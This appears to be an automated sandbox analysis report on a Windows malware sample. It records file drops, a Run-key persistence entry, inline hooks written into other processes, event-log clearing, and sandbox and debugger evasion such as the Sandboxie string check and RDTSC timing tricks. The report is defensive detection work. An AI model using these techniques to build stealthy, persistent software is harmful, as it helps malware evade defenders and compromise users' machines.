                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_04292E16 VariantInit,CoInitialize,CoCreateInstance,SafeArrayAccessData,SafeArrayGetLBound,SafeArrayGetUBound,CoTaskMemAlloc,SafeArrayUnaccessData,VariantClear,CoUninitialize,0_2_04292E16
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Program Files (x86)\IemFNeJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tant[1].bmpJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 9.12
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMutant created: \Sessions\1\BaseNamedObjects\MyProgramMutex
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2a120cb6-807b-432f-a7a8-23047b4af89c}
                      Source: N6xnw0iEGs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: N6xnw0iEGs.exeReversingLabs: Detection: 21%
                      Source: N6xnw0iEGs.exeVirustotal: Detection: 29%
                      Source: Fj0RhXL.exeString found in binary or memory: <!--StartFragment -->
                      Source: Fj0RhXL.exeString found in binary or memory: <!--StartFragment -->
                      Source: Fj0RhXL.exeString found in binary or memory: <!--StartFragment -->
                      Source: Fj0RhXL.exeString found in binary or memory: <!--StartFragment -->
                      Source: unknownProcess created: C:\Users\user\Desktop\N6xnw0iEGs.exe "C:\Users\user\Desktop\N6xnw0iEGs.exe"
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: libcef.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: d3d9.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: dbgcore.dllJump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: N6xnw0iEGs.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: N6xnw0iEGs.exeStatic file information: File size 31561216 > 1048576
                      Source: N6xnw0iEGs.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x154a00
                      Source: N6xnw0iEGs.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1c09400
                      Source: N6xnw0iEGs.exeStatic PE information: More than 200 imports for USER32.dll
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: N6xnw0iEGs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                      Source: Binary string: J:\work\res_checker\netdia\Release\NetDiagnotor.pdb source: N6xnw0iEGs.exe
                      Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                      Source: N6xnw0iEGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: N6xnw0iEGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: N6xnw0iEGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: N6xnw0iEGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: N6xnw0iEGs.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F0C5FC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_02F0C5FC
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .ubx1
                      Source: Fj0RhXL.exe.0.drStatic PE information: section name: .00cfg
                      Source: Fj0RhXL.exe.0.drStatic PE information: section name: .ubx0
                      Source: Fj0RhXL.exe.0.drStatic PE information: section name: .ubx1
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_0052D14B push ecx; ret 0_2_0052D15E
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_0429EC99 push ecx; ret 0_2_0429ECAC
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_042A3A9A push ecx; ret 0_2_042A3AAD
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_1000EC95 push ecx; ret 0_2_1000ECA8
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeCode function: 0_2_10013A96 push ecx; ret 0_2_10013AA9
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F09EC5 push ecx; ret 6_2_02F09ED8
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DA2F35 push ecx; ret 6_2_03DA2F48
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D9CD01 push ecx; ret 6_2_03D9CD14
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DB2484 push ebp; retf 6_2_03DB24A4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DB24A0 push ebp; retf 6_2_03DB24A4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DB246C push ebp; retf 6_2_03DB24A4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03DB2430 push ebp; retf 6_2_03DB24A4
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3DFF94 push 3BFFFFFFh; retf 6_2_6C3DFF99
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3D7865 push ecx; ret 6_2_6C3D7878
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C39B993 push 03FFFFFFh; retf 6_2_6C39B998
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C39B6AD push 03FFFFFFh; retf 6_2_6C39B6B2
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F73A8 push ecx; ret 6_2_6C3F7398
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_6C3F7399 push ecx; ret 6_2_6C3F7398
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_032B9892 push ecx; ret 6_2_032B98A5
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3DFF94 push 3BFFFFFFh; retf 7_2_6C3DFF99
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3D7865 push ecx; ret 7_2_6C3D7878
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C39B993 push 03FFFFFFh; retf 7_2_6C39B998
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C39B6AD push 03FFFFFFh; retf 7_2_6C39B6B2
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F73A8 push ecx; ret 7_2_6C3F7398
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 7_2_6C3F7399 push ecx; ret 7_2_6C3F7398
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Program Files (x86)\IemFNe\MSVCP140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Program Files (x86)\IemFNe\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile created: C:\Program Files (x86)\IemFNe\libcef.dllJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 5408 base: 2E00005 value: E9 8B 2F 10 74 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 5408 base: 76F02F90 value: E9 7A D0 EF 8B Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 5408 base: 2E10007 value: E9 EB DF 12 74 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 5408 base: 76F3DFF0 value: E9 1E 20 ED 8B Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 7316 base: 1360005 value: E9 8B 2F BA 75 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 7316 base: 76F02F90 value: E9 7A D0 45 8A Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 7316 base: 1370007 value: E9 EB DF BC 75 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 7316 base: 76F3DFF0 value: E9 1E 20 43 8A Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 1432 base: 1310005 value: E9 8B 2F BF 75 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 1432 base: 76F02F90 value: E9 7A D0 40 8A Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 1432 base: 1470007 value: E9 EB DF AC 75 Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeMemory written: PID: 1432 base: 76F3DFF0 value: E9 1E 20 53 8A Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D96080 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,6_2_03D96080
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059Jump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Fj0RhXL.exe, 00000006.00000002.3621039775.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078234301.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157985252.00000000008B4000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeRDTSC instruction interceptor: First address: BC92C8 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 xor cl, FFFFFF9Ah 0x00000005 mov eax, ebp 0x00000007 rdtsc
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeRDTSC instruction interceptor: First address: BF0B47 second address: 102AF4A instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 movzx eax, di 0x00000006 pop eax 0x00000007 cwd 0x00000009 jmp 00007F2ACC80EC87h 0x0000000e pop esi 0x0000000f movzx edx, cx 0x00000012 jmp 00007F2ACC5BCEC8h 0x00000017 pop ebx 0x00000018 xchg dh, dl 0x0000001a movsx edx, di 0x0000001d pop edx 0x0000001e jmp 00007F2ACC66607Ah 0x00000023 ret 0x00000024 popfd 0x00000025 rdtsc
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeRDTSC instruction interceptor: First address: 9BEAAF second address: 9BEAB3 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 pop edi 0x00000004 rdtsc
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeRDTSC instruction interceptor: First address: 9BEAB3 second address: 8F4D48 instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 3E4A5909h 0x00000007 pop ebp 0x00000008 xchg bh, bl 0x0000000a jmp 00007F2ACC60AD4Ah 0x0000000f pop ebx 0x00000010 rdtsc
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeSpecial instruction interceptor: First address: 102AF4A instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeWindow / User API: threadDelayed 3122Jump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeDropped PE file which has not been started: C:\Program Files (x86)\IemFNe\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeDropped PE file which has not been started: C:\Program Files (x86)\IemFNe\MSVCP140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-18873
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-19201
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-19010
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeAPI coverage: 1.0 %
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exe TID: 7596Thread sleep time: -93000s >= -30000sJump to behavior
